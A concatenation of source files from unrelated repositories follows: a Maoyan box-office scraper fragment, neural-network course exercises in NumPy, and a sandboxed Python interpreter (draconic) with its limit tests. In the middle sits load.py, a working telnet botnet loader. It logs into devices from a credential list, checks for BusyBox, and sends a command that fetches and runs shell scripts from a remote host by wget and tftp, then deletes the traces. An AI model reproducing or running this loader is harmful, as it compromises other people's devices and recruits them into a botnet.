column = [i['name'] for i in dt['boxDatas'][0]['indicatrixs']]
index = pd.to_datetime([i['showDate'] for i in dt['boxDatas'][0]['data']])
data = [i['selectData'] for i in dt['boxDatas'][0]['data']]
df = pd.DataFrame(data, columns=column, index=index).applymap(process_data)
df[['分账票房','综合票房']] = df[['分账票房','综合票房']].applymap(lambda x:x*10000)
return {'id':dt['movieId'], 'name':dt['movieName'], 'data':df}
def get_movie_boxinfo_live(date: str = ''):
"""movie box office live data."""
param = date and {'beginDate':arrow.get(date).format('YYYYMMDD')} or {}
resp = sess.get(api.movie_live, params=param, headers=head)
dt = resp.json()['data']
column = ('id,名称,分账票房,分账票房占比,综合票房,综合票房占比,排片场次,排片占比,'
'排座占比,场均人次,上座率,综合票价,分账票价,网售占比,猫眼退票人次,猫眼退票率,'
'大盘退票人次,大盘退票率,观影人数,累计票房,分账累计票房')
data = [[
i['movieId'],i['movieName'],i['splitBoxInfo'],i['splitBoxRate'],
i['boxInfo'],i['boxRate'],i['showInfo'],i['showRate'],i['seatRate'],
i['avgShowView'],i['avgSeatView'],i['avgViewBox'],i['splitAvgViewBox'],
i['onlineBoxRate'],i['myRefundNumInfo'],i['myRefundRateInfo'],i['refundViewInfo'],
i['refundViewRate'],i['viewInfo'],i['sumBoxInfo'],i['splitSumBoxInfo']
] for i in dt['list']]
return {
'split_total_box': dt['splitTotalBox'],
'total_box': dt['totalBox'],
'maoyan_view': dt['crystal']['maoyanViewInfo'],
'online_view': dt['crystal'].get('onlineViewInfo'),
'total_view': dt['crystal']['viewInfo'],
'data': pd.DataFrame(data, columns=column.split(','))
}
``` |
{
"source": "1doudou1/Neural-Network",
"score": 3
} |
#### File: Neural-Network/C1_W3/Main.py
```python
import numpy as np
import matplotlib.pyplot as plt
from testCases import *
import sklearn
import sklearn.datasets
import sklearn.linear_model
from planar_utils import plot_decision_boundary, sigmoid, load_planar_dataset, load_extra_datasets
np.random.seed(1)
# Here comes the Function
X,Y = load_planar_dataset() # X is point and Y is label
plt.scatter(X[0,:],X[1,:],c=Y,s=40,cmap=plt.cm.Spectral)
shape_X = X.shape # The raw data
shape_Y = Y.shape # The label of data
m= Y.shape[1] # Total Data number, in here is 400
print("The dimension for X is "+str(shape_X))
print("THe dimension for Y is "+str(shape_Y))
print("The dataset has total data "+ str(m))
clf = sklearn.linear_model.LogisticRegressionCV()
clf.fit(X.T,Y.T)
plot_decision_boundary(lambda x: clf.predict(x),X,Y)
plt.title("Logistic Regression")
LR_predictions = clf.predict(X.T)
print("The accuracy for logistic regression is %d" %float((np.dot(Y,LR_predictions)+\
np.dot(1-Y,1-LR_predictions))/float(Y.size)*100)+"% right point" )
# print: All str is in the "". And the variables are in form of % float sth like that
def layer_sizes(X,Y):
n_x = X.shape[0] # Input layer
n_h = 4 # Hidden layer
n_y = Y.shape[0] # Output layer
return(n_x,n_h,n_y)
def initialize_parameters(n_x,n_h,n_y):
np.random.seed(2)
w1 = np.random.randn(n_h,n_x)*0.01
b1 = np.zeros(shape=(n_h,1))
w2 = np.random.randn(n_y,n_h)*0.01
b2 = np.zeros(shape=(n_y,1))
assert(w1.shape == (n_h,n_x))
assert(b1.shape == (n_h,1))
assert(w2.shape == (n_y,n_h))
assert(b2.shape == (n_y,1))
parameters = {"w1" : w1,
"b1" : b1,
"w2" : w2,
"b2" : b2
}
return parameters
def forward_propagation(X, parameters):
w1 = parameters["w1"]
b1 = parameters["b1"]
w2 = parameters["w2"]
b2 = parameters["b2"]
Z1 = np.dot(w1,X) + b1
A1 = np.tanh(Z1)
Z2 = np.dot(w2,A1) + b2
A2 = sigmoid(Z2)
assert(A2.shape == (1,X.shape[1]))
cache = {"Z1" : Z1,
"A1" : A1,
"Z2" : Z2,
"A2" : A2
}
return(A2,cache)
def compute_cost(A2,Y,parameters):
m = Y.shape[1]
w1 = parameters["w1"]
w2 = parameters["w2"]
logprobs = np.multiply(np.log(A2),Y) + np.multiply((1-Y),np.log(1-A2))
cost = - np.sum(logprobs) / m
cost = float(np.squeeze(cost))
assert(isinstance(cost,float))
return cost
def backward_propagation(parameters,cache,X,Y):
m = X.shape[1]
w1 = parameters["w1"]
w2 = parameters["w2"]
A1 = cache["A1"]
A2 = cache["A2"]
dZ2 = A2 - Y
dw2 = (1/m) * np.dot(dZ2, A1.T)
db2 = (1/m) * np.sum(dZ2,axis=1,keepdims=True)
dZ1 = np.multiply(np.dot(w2.T,dZ2),1-np.power(A1,2))
dw1 = (1/m)*np.dot(dZ1,X.T)
db1 = (1/m)*np.sum(dZ1,axis=1,keepdims=True)
grads = {"dw1":dw1,
"db1":db1,
"dw2":dw2,
"db2":db2
}
return grads
def update_parameters(parameters,grads,learning_rate=1.2):
w1,w2 = parameters["w1"],parameters["w2"]
b1,b2 = parameters["b1"],parameters["b2"]
dw1,dw2 = grads["dw1"],grads["dw2"]
db1,db2 = grads["db1"],grads["db2"]
w1 = w1 - learning_rate * dw1
b1 = b1 - learning_rate * db1
w2 = w2 - learning_rate * dw2
b2 = b2 - learning_rate * db2
parameters = { "w1":w1,
"b1":b1,
"w2":w2,
"b2":b2
}
return parameters
def nn_model(X,Y,n_h,num_iterations,print_cost=False):
np.random.seed(3)
n_x = layer_sizes(X,Y)[0]
n_y = layer_sizes(X,Y)[2]
parameters = initialize_parameters(n_x,n_h,n_y)
w1 = parameters["w1"]
b1 = parameters["b1"]
w2 = parameters["w2"]
b2 = parameters["b2"]
for i in range(num_iterations):
A2, cache = forward_propagation(X,parameters)
cost = compute_cost(A2,Y,parameters)
grads = backward_propagation(parameters,cache,X,Y)
parameters = update_parameters(parameters,grads,learning_rate = 0.5)
if print_cost:
if i%1000 ==0:
print("The",i,"iteration cost is "+str(cost))
return parameters
def predict(parameters,X):
A2, cache = forward_propagation(X,parameters)
predictions = np.round(A2)
return predictions
#--------------------MAIN FUNCTION--------------------------
parameters = nn_model(X,Y,n_h = 4, num_iterations=10000, print_cost=True)
plot_decision_boundary(lambda x: predict(parameters,x.T),X,Y)
plt.title("Decision Boundary for hidden layer size" +str(4))
predictions = predict(parameters,X)
print('The accuracy is %d' %float((np.dot(Y,predictions.T)+np.dot(1-Y,1-predictions.T))/float(Y.size)*100)+'%')
#-------------------END OF MAIN FUNCTION------------------------
plt.figure(figsize=(16,32))
hidden_layer_sizes = [1,2,3,4,5,20,50] # The number of hidden layer
for i,n_h in enumerate(hidden_layer_sizes):
plt.subplot(5,2,i+1)
plt.title('Hidden Layer of size %d' %n_h)
parameters = nn_model(X,Y,n_h,num_iterations=5000)
plot_decision_boundary(lambda x:predict(parameters,x.T),X,Y)
predictions = predict(parameters,X)
accuracy = float((np.dot(Y,predictions.T)+np.dot(1-Y,1-predictions.T))\
/float(Y.size)*100)
print("THE NUMBER OF HIDDEN LAYER:{} Accuracy:{} %".format(n_h,accuracy))
```
#### File: Neural-Network/C1_W4/Multi-layer_nn.py
```python
import numpy as np
import h5py
import matplotlib.pyplot as plt
import testCases
from dnn_utils import sigmoid, sigmoid_backward, relu, relu_backward
import lr_utils
np.random.seed(1)
#-------------------Programming Area------------------------------------------
train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = lr_utils.load_dataset()
train_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0],-1).T
test_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0],-1).T
train_x = train_x_flatten / 255
train_y = train_set_y
test_x = test_x_flatten / 255
test_y = test_set_y
layers_dims = [12288,30,7,5,1] # five layer model
# Through the dimension we see the weight and bias
def initialize_parameters_deep(layers_dims):
np.random.seed(3)
parameters = {} # dictionary
L=len(layers_dims)
for l in range(1,L): # For Each layer. 1-5 in this case
parameters["W"+str(l)] = np.random.randn(layers_dims[l],layers_dims[l-1])/np.sqrt(layers_dims[l-1]) # All the column stroge the input feature and all the rows representing the number of nodes in next layer
parameters["b"+str(l)] = np.zeros((layers_dims[l],1))
assert(parameters["W"+str(l)].shape == (layers_dims[l],layers_dims[l-1]))
assert(parameters["b"+str(l)].shape == (layers_dims[l],1))
return parameters
# Through the input training data and weight and bias we finish forward prob.
def L_model_forward(X,parameters):
caches = []
A=X # X is acuallly the training data
L=len(parameters) //2 # fix
for l in range(1,L):
A_prev = A
A, cache = linear_activation_forward(A_prev, parameters['W'+str(l)],\
parameters['b'+str(l)],"relu")
caches.append(cache)
AL , cache = linear_activation_forward(A,parameters['W'+str(L)],parameters['b'+str(L)],\
"sigmoid")
caches.append(cache)
assert(AL.shape == (1,X.shape[1]))
return AL, caches
# Calculating the cost
def compute_cost(AL,Y):
m=Y.shape[1]
cost = -np.sum(np.multiply(np.log(AL),Y)+np.multiply(np.log(1-AL),1-Y))/m
cost = np.squeeze(cost) # list,tuple --> array
assert(cost.shape == ())
return cost
# Through the cost we derive the grads
def L_model_backward(AL,Y,caches):
grads = {}
L = len(caches)
m = AL.shape[1]
Y = Y.reshape(AL.shape)
dAL = -(np.divide(Y,AL) - np.divide(1-Y,1-AL))
current_cache = caches[L-1]
grads["dA"+str(L)],grads["dW"+str(L)],grads["db"+str(L)] = linear_activation_backward(dAL,current_cache,"sigmoid")
for l in reversed(range(L-1)):
current_cache = caches[l]
dA_prev_temp, dW_temp, db_temp = linear_activation_backward(grads["dA"+str(l+2)],current_cache,"relu")
grads["dA"+str(l+1)] = dA_prev_temp
grads["dW"+str(l+1)] = dW_temp
grads["db"+str(l+1)] = db_temp
return grads
# Through the parameters, grads and the hyper-parameter learning_rate, we finish the update
def update_parameters(parameters,grads,learning_rate):
L=len(parameters) //2
for l in range(L):
parameters["W"+str(l+1)] = parameters["W"+str(l+1)] - learning_rate * grads["dW"+str(l+1)]
parameters["b"+str(l+1)] = parameters["b"+str(l+1)] - learning_rate * grads["db"+str(l+1)]
return parameters
#--------------------------------Finish One circut-----------------------------
def initialize_parameters(n_x,n_h,n_y):
w1 = np.random.randn(n_h,n_x)*0.01 # Each Hidden nodes is coressponding to multiple input features
b1 = np.zeros((n_h,1)) # The number of hidden layer is equal to the number of b needed
w2 = np.random.randn(n_y,n_h)*0.01 # Each output args has n_h hidden layer connect to it
b2 = np.zeros((n_y,1)) # Intialize b to be 0.
assert(w1.shape == (n_h,n_x)) # If the input Args are wrong, the use assert we could identify the wronging problems
assert(b1.shape == (n_h,1))
assert(w2.shape == (n_y,n_h))
assert(b2.shape == (n_y,1))
parameters={"w1": w1,
"b1": b1,
"w2": w2,
"b2": b2
}
return parameters
def linear_activation_forward(A_prev,W,b,activation):
if activation == "sigmoid":
Z,linear_cache = linear_forward(A_prev,W,b)
A,activation_cache = sigmoid(Z)
elif activation == "relu":
Z,linear_cache = linear_forward(A_prev,W,b)
A, activation_cache = relu(Z)
assert(A.shape == (W.shape[0],A_prev.shape[1]))
cache = (linear_cache, activation_cache)
return A, cache
def linear_forward(A,W,b):
Z=np.dot(W,A)+b
assert(Z.shape == (W.shape[0],A.shape[1]))
cache=(A,W,b)
return Z,cache
def linear_backward(dZ,cache):
A_prev, W, b=cache
m = A_prev.shape[1]
dW = np.dot(dZ, A_prev.T) /m
db = np.sum(dZ,axis=1, keepdims=True) / m
dA_prev = np.dot(W.T,dZ)
assert(dA_prev.shape == A_prev.shape)
assert(dW.shape == W.shape)
assert(db.shape == b.shape)
return dA_prev, dW, db
def linear_activation_backward(dA,cache, activation = "relu"):
linear_cache, activation_cache = cache
if activation == "relu":
dZ = relu_backward(dA,activation_cache)
dA_prev, dW, db = linear_backward(dZ,linear_cache)
elif activation == "sigmoid":
dZ = sigmoid_backward(dA,activation_cache)
dA_prev,dW,db = linear_backward(dZ,linear_cache)
return dA_prev, dW, db
def Main(X,Y,layer_dims,learning_rate=0.0075,num_iterations=3000, print_cost=False, isPlot = True):
np.random.seed(1)
costs = []
parameters = initialize_parameters_deep(layers_dims)
for i in range(0,num_iterations):
AL, caches = L_model_forward(X,parameters)
cost = compute_cost(AL, Y)
grads = L_model_backward(AL,Y,caches)
parameters = update_parameters(parameters,grads,learning_rate)
if i % 100 == 0:
costs.append(cost)
if print_cost:
print("The",i,"iteration cost is ", np.squeeze(cost))
if isPlot:
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations(per tens)')
plt.title("Learning rate = " + str(learning_rate))
plt.show()
return parameters
parameters = Main(train_x,train_y,layers_dims,learning_rate=0.0075,num_iterations=2500,print_cost=True,isPlot=True)
# 被程序直接调用的需要摆在最后面(?),其他程序编译关系随意(?)
``` |
{
"source": "1Dragos12/arhive",
"score": 2
} |
#### File: arhive/hrdmv1/load.py
```python
import sys, re, os, socket, time
from multiprocessing import Process
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list]")
cmd="cd /tmp || cd /run || cd /; wget http://172.16.31.10/axisbins.sh; chmod 777 axisbins.sh; sh axisbins.sh; tftp 172.16.31.10 -c get axistftp1.sh; chmod 777 axistftp1.sh; sh axistftp1.sh; tftp -r axistftp2.sh -g 172.16.31.10; chmod 777 axistftp2.sh; sh axistftp2.sh; rm -rf axisbins.sh axistftp1.sh axistftp2.sh; rm -rf *" #payload goes here
info = open(str(sys.argv[1]),'a+')
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def infect(ip,username,password):
ip = str(ip).rstrip("\n")
username = username.rstrip("\n")
password = password.rstrip("\n")
try:
tn = socket.socket()
tn.settimeout(10)
tn.connect((ip,23))
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "ogin")
if "ogin" in hoho:
tn.send(username + "\n")
time.sleep(0.09)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, "assword:")
if "assword" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if ">" in prompt and "ONT" not in prompt:
try:
success = False
tn.send("cat | sh" + "\n")
time.sleep(0.1)
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
try:
success = False
timeout = 8
data = ["BusyBox", "Built-in"]
tn.send("sh" + "\n")
time.sleep(0.01)
tn.send("shell" + "\n")
time.sleep(0.01)
tn.send("help" + "\n")
time.sleep(0.01)
tn.send("busybox" + "\r\n")
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(40960)
time.sleep(0.01)
for info in data:
if info in buf and "unrecognized" not in buf:
success = True
break
except:
pass
else:
tn.close()
if success == True:
try:
tn.send(cmd + "\n")
print "\033[32m[\033[31m+\033[32m] \033[33mBot is joining :] !\033[32m %s"%(ip)
time.sleep(20)
tn.close()
except:
tn.close()
tn.close()
except Exception:
tn.close()
for x in info:
try:
if ":23 " in x:
x = x.replace(":23 ", ":")
xinfo = x.split(":")
session = Process(target=infect, args=(xinfo[0].rstrip("\n"),xinfo[1].rstrip("\n"),xinfo[2].rstrip("\n"),))
session.start()
ip=xinfo[0]
username=xinfo[1]
password=<PASSWORD>[2]
time.sleep(0.01)
except:
pass
session.join()
``` |
{
"source": "1drturtle/draconic",
"score": 3
} |
#### File: draconic/draconic/helpers.py
```python
import ast
import operator as op
from collections import UserList
from .exceptions import *
__all__ = ("DraconicConfig", "OperatorMixin", "approx_len_of", "safe_dict", "safe_list", "safe_set")
# ===== config =====
DISALLOW_PREFIXES = ['_', 'func_']
DISALLOW_METHODS = ['format', 'format_map', 'mro']
class DraconicConfig:
"""A configuration object to pass into the Draconic interpreter."""
def __init__(self, max_const_len=200000, max_loops=10000, max_statements=100000, max_power_base=1000000,
max_power=1000, disallow_prefixes=None, disallow_methods=None,
default_names=None, builtins_extend_default=True, max_int_size=64):
"""
Configuration object for the Draconic interpreter.
:param int max_const_len: The maximum length literal that should be allowed to be constructed.
:param int max_loops: The maximum total number of loops allowed per execution.
:param int max_statements: The maximum total number of statements allowed per execution.
:param int max_power_base: The maximum power base (x in x ** y)
:param int max_power: The maximum power (y in x ** y)
:param list disallow_prefixes: A list of str - attributes starting with any of these will be inaccessible
:param list disallow_methods: A list of str - methods named these will not be callable
:param dict default_names: A dict of str: Any - default names in the runtime
:param bool builtins_extend_default: If False, ``builtins`` to the interpreter overrides default names
:param int max_int_size: The maximum allowed size of integers (-2^(pow-1) to 2^(pow-1)-1). Default 64.
Integers can technically reach up to double this size before size check. *Not* the max value!
"""
if disallow_prefixes is None:
disallow_prefixes = DISALLOW_PREFIXES
if disallow_methods is None:
disallow_methods = DISALLOW_METHODS
self.max_const_len = max_const_len
self.max_loops = max_loops
self.max_statements = max_statements
self.max_power_base = max_power_base
self.max_power = max_power
self.max_int_size = max_int_size
self.min_int = -(2 ** (max_int_size - 1))
self.max_int = (2 ** (max_int_size - 1)) - 1
self.disallow_prefixes = disallow_prefixes
self.disallow_methods = disallow_methods
self.builtins_extend_default = builtins_extend_default
# types
self._list = safe_list(self)
self._dict = safe_dict(self)
self._set = safe_set(self)
# default names
if default_names is None:
default_names = self._default_names()
self.default_names = default_names
@property
def list(self):
return self._list
@property
def dict(self):
return self._dict
@property
def set(self):
return self._set
def _default_names(self):
return {
"True": True, "False": False, "None": None,
# functions
"bool": bool, "int": int, "float": float, "str": str, "tuple": tuple,
"dict": self.dict, "list": self.list, "set": self.set
}
# ===== operators =====
class OperatorMixin:
"""A mixin class to provide the operators."""
def __init__(self, config):
"""
:type config: draconic.helpers.DraconicConfig
"""
self._config = config
self.operators = {
# binary
ast.Add: self._safe_add,
ast.Sub: self._safe_sub,
ast.Mult: self._safe_mult,
ast.Div: op.truediv,
ast.FloorDiv: op.floordiv,
ast.Pow: self._safe_power,
ast.Mod: op.mod,
ast.LShift: self._safe_lshift,
ast.RShift: op.rshift,
ast.BitOr: op.or_,
ast.BitXor: op.xor,
ast.BitAnd: op.and_,
ast.Invert: op.invert,
# unary
ast.Not: op.not_,
ast.USub: op.neg,
ast.UAdd: op.pos,
# comparison
ast.Eq: op.eq,
ast.NotEq: op.ne,
ast.Gt: op.gt,
ast.Lt: op.lt,
ast.GtE: op.ge,
ast.LtE: op.le,
ast.In: lambda x, y: op.contains(y, x),
ast.NotIn: lambda x, y: not op.contains(y, x),
ast.Is: lambda x, y: x is y,
ast.IsNot: lambda x, y: x is not y,
}
def _safe_power(self, a, b):
"""Exponent: limit power base and power to prevent CPU-locking computation"""
if abs(a) > self._config.max_power_base or abs(b) > self._config.max_power:
_raise_in_context(NumberTooHigh, f"{a} ** {b} is too large of an exponent")
result = a ** b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "This exponent would create a number too large")
return result
def _safe_mult(self, a, b):
"""Multiplication: limit the size of iterables that can be created, and the max size of ints"""
# sequences can only be multiplied by ints, so this is safe
self._check_binop_operands(a, b)
if isinstance(b, int) and b * approx_len_of(a) > self._config.max_const_len:
_raise_in_context(IterableTooLong, 'Multiplying these two would create something too long')
if isinstance(a, int) and a * approx_len_of(b) > self._config.max_const_len:
_raise_in_context(IterableTooLong, 'Multiplying these two would create something too long')
result = a * b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "Multiplying these two would create a number too large")
return result
def _safe_add(self, a, b):
"""Addition: limit the size of iterables that can be created, and the max size of ints"""
self._check_binop_operands(a, b)
if approx_len_of(a) + approx_len_of(b) > self._config.max_const_len:
_raise_in_context(IterableTooLong, "Adding these two would create something too long")
result = a + b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "Adding these two would create a number too large")
return result
def _safe_sub(self, a, b):
"""Addition: limit the max size of ints"""
self._check_binop_operands(a, b)
result = a - b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "Subtracting these two would create a number too large")
return result
def _safe_lshift(self, a, b):
"""Left Bit-Shift: limit the size of integers/floats to prevent CPU-locking computation"""
self._check_binop_operands(a, b)
if isinstance(b, int) and b > self._config.max_int_size - 2:
_raise_in_context(NumberTooHigh, f"{a} << {b} is too large of a shift")
result = a << b
if isinstance(result, int) and (result < self._config.min_int or result > self._config.max_int):
_raise_in_context(NumberTooHigh, "Shifting these two would create a number too large")
return a << b
def _check_binop_operands(self, a, b):
"""Ensures both operands of a binary operation are safe (int limit)."""
if isinstance(a, int) and (a < self._config.min_int or a > self._config.max_int):
_raise_in_context(NumberTooHigh, "This number is too large")
if isinstance(b, int) and (b < self._config.min_int or b > self._config.max_int):
_raise_in_context(NumberTooHigh, "This number is too large")
def approx_len_of(obj, visited=None):
"""Gets the approximate size of an object (including recursive objects)."""
if isinstance(obj, str):
return len(obj)
if hasattr(obj, "__approx_len__"):
return obj.__approx_len__
if visited is None:
visited = [obj]
size = op.length_hint(obj)
if isinstance(obj, dict):
obj = obj.items()
try:
for child in iter(obj):
if child in visited:
continue
size += approx_len_of(child, visited)
visited.append(child)
except TypeError: # object is not iterable
pass
try:
setattr(obj, "__approx_len__", size)
except AttributeError:
pass
return size
# ===== compound types =====
# each function is a function that returns a class based on Draconic config
# ... look, it works
def safe_list(config):
class SafeList(UserList): # extends UserList so that [x] * y returns a SafeList, not a list
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__approx_len__ = approx_len_of(self)
def append(self, obj):
if approx_len_of(self) + 1 > config.max_const_len:
_raise_in_context(IterableTooLong, "This list is too long")
super().append(obj)
self.__approx_len__ += 1
def extend(self, iterable):
other_len = approx_len_of(iterable)
if approx_len_of(self) + other_len > config.max_const_len:
_raise_in_context(IterableTooLong, "This list is too long")
super().extend(iterable)
self.__approx_len__ += other_len
def pop(self, i=-1):
retval = super().pop(i)
self.__approx_len__ -= 1
return retval
def remove(self, item):
super().remove(item)
self.__approx_len__ -= 1
def clear(self):
super().clear()
self.__approx_len__ = 0
def __mul__(self, n):
# to prevent the recalculation of the length on list mult we manually set a new instance's
# data and approx len (JIRA-54)
new = SafeList()
new.data = self.data * n
new.__approx_len__ = self.__approx_len__ * n
return new
return SafeList
def safe_set(config):
class SafeSet(set):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__approx_len__ = approx_len_of(self)
def update(self, *s):
other_lens = sum(approx_len_of(other) for other in s)
if approx_len_of(self) + other_lens > config.max_const_len:
_raise_in_context(IterableTooLong, "This set is too large")
super().update(*s)
self.__approx_len__ += other_lens
def add(self, element):
if approx_len_of(self) + 1 > config.max_const_len:
_raise_in_context(IterableTooLong, "This set is too large")
super().add(element)
self.__approx_len__ += 1
def union(self, *s):
if approx_len_of(self) + sum(approx_len_of(other) for other in s) > config.max_const_len:
_raise_in_context(IterableTooLong, "This set is too large")
return SafeSet(super().union(*s))
def pop(self):
retval = super().pop()
self.__approx_len__ -= 1
return retval
def remove(self, element):
super().remove(element)
self.__approx_len__ -= 1
def discard(self, element):
super().discard(element)
self.__approx_len__ -= 1
def clear(self):
super().clear()
self.__approx_len__ = 0
return SafeSet
def safe_dict(config):
class SafeDict(dict):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__approx_len__ = approx_len_of(self)
def update(self, other_dict=None, **kvs):
if other_dict is None:
other_dict = {}
other_lens = approx_len_of(other_dict) + approx_len_of(kvs)
if approx_len_of(self) + other_lens > config.max_const_len:
_raise_in_context(IterableTooLong, "This dict is too large")
super().update(other_dict, **kvs)
self.__approx_len__ += other_lens
def __setitem__(self, key, value):
other_len = approx_len_of(value)
if approx_len_of(self) + other_len > config.max_const_len:
_raise_in_context(IterableTooLong, "This dict is too large")
self.__approx_len__ += other_len
return super().__setitem__(key, value)
def pop(self, k):
retval = super().pop(k)
self.__approx_len__ -= 1
return retval
def __delitem__(self, key):
super().__delitem__(key)
self.__approx_len__ -= 1
return SafeDict
```
#### File: draconic/tests/test_limits.py
```python
import pytest
from draconic import DraconicInterpreter
from draconic.exceptions import *
from draconic.helpers import DraconicConfig
@pytest.fixture()
def i():
# 1000-size iterables, don't limit us by loops, signed 32b int limit
config = DraconicConfig(max_loops=99999999, max_const_len=1000, max_int_size=32)
return DraconicInterpreter(config=config)
def test_creating(i, e):
really_long_str = 'foo' * 1000
not_quite_as_long = 'f' * 999
i._names['long'] = really_long_str
i._names['lesslong'] = not_quite_as_long
# strings
with pytest.raises(IterableTooLong):
e(f"'{really_long_str}'")
# lists
with pytest.raises(FeatureNotAvailable): # we don't allow this
e(f"[*long, *long]")
def test_list(i, e):
e("long = [1] * 1000")
with pytest.raises(IterableTooLong):
e("long.append(1)")
with pytest.raises(IterableTooLong):
e("long.extend([1])")
with pytest.raises(IterableTooLong):
e("long.extend(long)")
# we should always be operating using safe lists
i.builtins['reallist'] = [1, 2, 3]
e("my_list = [1, 2, 3]")
assert isinstance(e("my_list + reallist"), i._list)
assert isinstance(e("reallist + my_list"), i._list)
e("my_list.extend(reallist)")
assert isinstance(e("my_list"), i._list)
def test_set(i, e):
i.builtins['range'] = range
e("long = set(range(1000))")
e("long2 = set(range(1000, 2000))")
with pytest.raises(IterableTooLong):
e("long.add(1000)")
with pytest.raises(IterableTooLong):
e("long.update(long2)")
with pytest.raises(IterableTooLong):
e("long.union(long2)")
with pytest.raises(IterableTooLong):
e("long.update({1000})")
# we should always be operating using safe sets
i.builtins['realset'] = {1, 2, 3}
e("my_set = {3, 4, 5}")
# these operations don't work because sets use bitwise ops and we don't allow those
# assert isinstance(e("my_set | realset"), i._set)
# assert isinstance(e("realset | my_set"), i._set)
e("my_set.update(realset)")
assert isinstance(e("my_set"), i._set)
assert isinstance(e("my_set.union(realset)"), i._set)
def test_dict(i, e):
i.builtins['range'] = range
e("long = dict((i, i) for i in range(1000))")
e("long2 = {i: i for i in range(1000, 2000)}")
with pytest.raises(IterableTooLong):
e("long.update(long2)")
with pytest.raises(IterableTooLong):
e("long.update({'foo': 'bar'})")
def test_that_it_still_works_right(i, e):
e("l = [1, 2]")
e("d = {1: 1}")
e("s = {1, 2}")
e("l.append(3)")
assert e("l") == [1, 2, 3]
assert isinstance(i.names['l'], i._list)
e("s.add(3)")
assert e("s") == {1, 2, 3}
assert isinstance(i.names['s'], i._set)
e("d.update({2: 2})")
assert e("d") == {1: 1, 2: 2}
assert isinstance(i.names['d'], i._dict)
def test_types(i, e):
# when we have a compound type as a builtin, users shouldn't be able to modify it directly...
i.builtins.update({'rl': [1, 2], 'rd': {1: 1, 2: 2}})
e("rl[1] = 3")
e("rd[2] = 3")
assert i.names['rl'] == [1, 2]
assert i.names['rd'] == {1: 1, 2: 2}
# but setting it to a name is fine
e("l = rl")
e("d = rd")
e("l[1] = 3")
e("d[2] = 3")
assert i.names['l'] == [1, 3]
assert i.names['d'] == {1: 1, 2: 3}
def test_types_again(i, e):
e("a = [1, 2, 3]")
e("b = list('123')")
assert type(i.names['a']) is type(i.names['b']) is i._list
e("a = {1, 2, 3}")
e("b = set('123')")
assert type(i.names['a']) is type(i.names['b']) is i._set
e("a = {1: 1, 2: 2}")
e("b = dict(((1, 1), (2, 2)))")
assert type(i.names['a']) is type(i.names['b']) is i._dict
def test_int_limits(e):
max_int = (2 ** 31) - 1
min_int = -(2 ** 31)
e(f"max_int = {max_int}")
e(f"min_int = {min_int}")
# result is too large
with pytest.raises(NumberTooHigh):
e("max_int + 1")
with pytest.raises(NumberTooHigh):
e("max_int - -1")
with pytest.raises(NumberTooHigh):
e("max_int * 2")
with pytest.raises(NumberTooHigh):
e("max_int << 1")
with pytest.raises(NumberTooHigh):
e("max_int * max_int")
with pytest.raises(NumberTooHigh):
e("2 ** 31")
with pytest.raises(NumberTooHigh):
e("2 << 31")
with pytest.raises(NumberTooHigh):
e("min_int - 1")
with pytest.raises(NumberTooHigh):
e("min_int + -1")
with pytest.raises(NumberTooHigh):
e("min_int * 2")
with pytest.raises(NumberTooHigh):
e("min_int << 1")
with pytest.raises(NumberTooHigh):
e("min_int * -min_int")
def test_int_limits_one_op(e):
max_int = (2 ** 31) - 1
min_int = -(2 ** 31)
e(f"max_int = {max_int}")
e(f"min_int = {min_int}")
# one operand is too large
e(f"over_max_int = {max_int + 1}")
e(f"under_min_int = {min_int - 1}")
with pytest.raises(NumberTooHigh):
e("over_max_int - 1")
with pytest.raises(NumberTooHigh):
e("1 - over_max_int")
with pytest.raises(NumberTooHigh):
e("over_max_int + -1")
with pytest.raises(NumberTooHigh):
e("-1 + over_max_int")
with pytest.raises(NumberTooHigh):
e("over_max_int * 1")
with pytest.raises(NumberTooHigh):
e("1 * over_max_int")
with pytest.raises(NumberTooHigh):
e("under_min_int - 1")
with pytest.raises(NumberTooHigh):
e("1 - under_min_int")
with pytest.raises(NumberTooHigh):
e("under_min_int + -1")
with pytest.raises(NumberTooHigh):
e("-1 + under_min_int")
with pytest.raises(NumberTooHigh):
e("under_min_int * 1")
with pytest.raises(NumberTooHigh):
e("1 * under_min_int")
def test_int_limits_not_floats(e):
max_int = (2 ** 31) - 1
min_int = -(2 ** 31)
e(f"max_int = {max_int}")
e(f"min_int = {min_int}")
# floats are fine
assert e("max_int * 1.5") == max_int * 1.5
assert e("max_int / 0.5") == max_int / 0.5
assert e("max_int // 0.5") == max_int // 0.5
assert type(e("max_int // 0.5")) is float
assert e("min_int * 1.5") == min_int * 1.5
assert e("min_int / 0.5") == min_int / 0.5
assert e("min_int // 0.5") == min_int // 0.5
assert type(e("min_int // 0.5")) is float
@pytest.mark.timeout(1) # list mult should be fast, even if we do it a lot
def test_list_mult_speed():
